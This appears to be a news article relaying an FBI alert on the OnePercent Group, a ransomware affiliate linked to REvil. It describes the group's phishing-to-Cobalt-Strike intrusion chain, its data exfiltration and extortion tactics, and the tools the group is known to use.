The FBI has identified a threat actor known as OnePercent Group, which has been actively targeting organizations in the US since November 2020.
“The FBI has learned of a cyber-criminal group who self identifies as the ‘OnePercent Group’ and who have used Cobalt Strike to perpetuate ransomware attacks against US companies since November 2020,” the FBI said.
OnePercent Group is a ransomware operation that encrypts the victim’s data and exfiltrates before encrypting.
“The actors contact the victims via telephone and email, threatening to release the stolen data through The Onion Router (TOR) network and clearnet, unless a ransom is paid in virtual currency,” the FBI said.
In the initial stage of the attack, the threat actor uses phishing emails to infect victims with the IcedID banking trojan. After installing the malware, they install Cobalt Strike on compromised endpoints to spread laterally through the compromised network.
OnePercent will maintain access to the network for up to a month to exfiltrate the files. After that, they will launch the ransomware payload to encrypt the victim’s data.
In ransom notes, victims are provided with a Tor website to get more info on the ransom, negotiate with the attackers, and get “technical support.’ Victims are asked to pay mostly in bitcoins to get a decryption key within 48 hours.
The FBI stated that a ransomware campaign would use spoofed phone numbers to contact its victims.
“Once the ransomware is successfully deployed, the victim will start to receive phone calls through spoofed phone numbers with ransom demands and are provided a ProtonMail email address for further communication,” the FBI added. “The actors will persistently demand to speak with a victim company’s designated negotiator or otherwise threaten to publish the stolen data.”
OnePercent Group uses various applications and services as part of its infrastructure. These include: AWS S3 cloud, IcedID, Cobalt Strike, Powershell, Rclone, Mimikatz, SharpKatz, BetterSafetyKatz, SharpSploit.
The FBI has linked OnePercent Group’s attack to the notorius REvil gang, naming it one of their affiliates because OnePercent Group used REvil’s data leak site to leak and auction their victims’ stolen files.
“If the ransom is not paid in full after the “one percent leak,” OnePercent Group actors threaten to sell the stolen data to the Sodinokibi Group to publish at an auction,” the FBI added.